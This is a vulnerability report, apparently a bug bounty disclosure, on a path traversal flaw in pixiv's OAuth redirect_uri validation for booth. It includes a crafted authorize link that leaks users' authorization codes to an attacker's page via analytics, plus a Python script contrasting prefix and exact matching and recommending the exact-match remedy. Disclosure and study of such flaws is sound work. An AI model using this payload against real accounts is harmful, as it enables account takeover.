Path traversal in OAuth redirect_uri
which can lead to a user's authorization code being leaked to a malicious user.
The following authorization code flow request is generated when a user logs in to booth through pixiv.
https://oauth.secure.pixiv.net/v2/auth/authorize?client_id=a1Z7w6JssUQkw5Hid0uIDeuesue9&redirect_uri=https%3A%2F%2Fbooth.pm%2Fusers%2Fauth%2Fpixiv%2Fcallback&response_type=code&scope=read-works+read-favorite-users+read-friends+read-profile+read-email+write-profile&state=%3A1a38b53563599621ce25094661b1c4458ddb52d79d771149
The redirect_uri parameter is accepted even when it contains ../ path segments after the registered callback path (path traversal). The browser resolves those segments, so the attacker can send the user to a product page the attacker created instead of the callback:
redirect_uri=https%3A%2F%2Fbooth.pm%2Fusers%2Fauth%2Fpixiv%2Fcallback/../../../../ja/items/4503924
-> the user is redirected to https://booth.pm/ja/items/4503924, with the code and state parameters appended as the query string
If the attacker has Google Analytics enabled on that product page, the full landing URL including the query string is recorded when the victim is redirected there, so the still-unused authorization code is leaked to the attacker.
https://oauth.secure.pixiv.net/v2/auth/authorize?client_id=a1Z7w6JssUQkw5Hid0uIDeuesue9&redirect_uri=https%3A%2F%2Fbooth.pm%2Fusers%2Fauth%2Fpixiv%2Fcallback/../../../../ja/items/[attacker's product id]&response_type=code&scope=read-works+read-favorite-users+read-friends+read-profile+read-email+write-profile&state=%3A1a38b53563599621ce25094661b1c4458ddb52d79d771149
When the victim clicks the above link and completes the login process, they are redirected to the attacker's product page.
The attacker can then read the victim's authorization code from the Google Analytics real-time reports.
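The following script is an added example and not part of the original report or of pixiv's code; it reconstructs the two halves of the issue above. It decodes the attacker's authorize link, contrasts a prefix-style redirect_uri check (which the traversal payload passes) with the exact-match check RFC 6749 requires, and computes where the browser actually lands once the authorization server appends code and state and the user agent removes the dot segments. The registered callback and client_id are taken from the report; the authorization code value, the shortened scope list and the function names are assumptions made for the example.

```python
"""Prefix vs exact redirect_uri matching, and where a ../ redirect_uri actually lands."""
from urllib.parse import parse_qs, urlencode, urlsplit, urlunsplit

# Registered callback for booth's client_id, taken from the authorize request in the report.
REGISTERED_REDIRECTS = {
    "a1Z7w6JssUQkw5Hid0uIDeuesue9": "https://booth.pm/users/auth/pixiv/callback",
}

# The attacker's authorize link from the report (constructed copy; scope list shortened).
MALICIOUS_AUTHORIZE_URL = (
    "https://oauth.secure.pixiv.net/v2/auth/authorize"
    "?client_id=a1Z7w6JssUQkw5Hid0uIDeuesue9"
    "&redirect_uri=https%3A%2F%2Fbooth.pm%2Fusers%2Fauth%2Fpixiv%2Fcallback"
    "/../../../../ja/items/4503924"
    "&response_type=code&scope=read-works+read-profile"
    "&state=%3A1a38b53563599621ce25094661b1c4458ddb52d79d771149"
)


def parse_authorize_request(url: str) -> dict:
    """Decode the authorize request the way the server sees it (percent-decoding applied)."""
    q = parse_qs(urlsplit(url).query)
    return {k: v[0] for k, v in q.items()}


def prefix_check(client_id: str, redirect_uri: str) -> bool:
    """Weak validation (assumed for illustration): any value that starts with the
    registered callback passes. This is the behaviour the traversal payload exploits."""
    return redirect_uri.startswith(REGISTERED_REDIRECTS[client_id])


def exact_check(client_id: str, redirect_uri: str) -> bool:
    """Hardened validation: exact string match with the registered callback
    (RFC 6749 section 3.1.2.2). No normalisation is done, so ../, %2e%2e,
    a trailing slash or an extra query string all fail."""
    return redirect_uri == REGISTERED_REDIRECTS[client_id]


def remove_dot_segments(path: str) -> str:
    """RFC 3986 section 5.2.4 dot-segment removal for an absolute path,
    i.e. what the browser does before it sends the request."""
    segments = []
    for seg in path.split("/")[1:]:  # path starts with "/", drop the empty first segment
        if seg == ".":
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments)


def browser_landing_url(redirect_uri: str, code: str, state: str) -> str:
    """URL the user agent ends up requesting after the authorization server appends
    code and state to redirect_uri and the browser resolves the dot segments."""
    parts = urlsplit(redirect_uri)
    query = urlencode({"code": code, "state": state})
    if parts.query:
        query = parts.query + "&" + query
    return urlunsplit((parts.scheme, parts.netloc, remove_dot_segments(parts.path), query, ""))


if __name__ == "__main__":
    req = parse_authorize_request(MALICIOUS_AUTHORIZE_URL)
    cid, ruri = req["client_id"], req["redirect_uri"]
    print("redirect_uri as decoded :", ruri)
    print("prefix check accepts?   :", prefix_check(cid, ruri))
    print("exact check accepts?    :", exact_check(cid, ruri))
    # "CODE_FROM_PIXIV" stands in for the real authorization code (constructed value).
    print("browser lands on        :", browser_landing_url(ruri, "CODE_FROM_PIXIV", req["state"]))
```

Running the script shows the decoded redirect_uri passing the prefix check and failing the exact check, and the landing URL https://booth.pm/ja/items/4503924?code=CODE_FROM_PIXIV&state=... , which is exactly the page view (query string included) that the attacker's analytics would record. The remedy is the exact comparison: the authorization server should compare redirect_uri with the registered value byte for byte rather than accepting any variant of it.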
Due to path traversal in the redirect_uri
parameter of the OAuth flow, it is possible to redirect authenticated users to the attacker's product page together with their OAuth authorization code, which the attacker can then use to take over their account.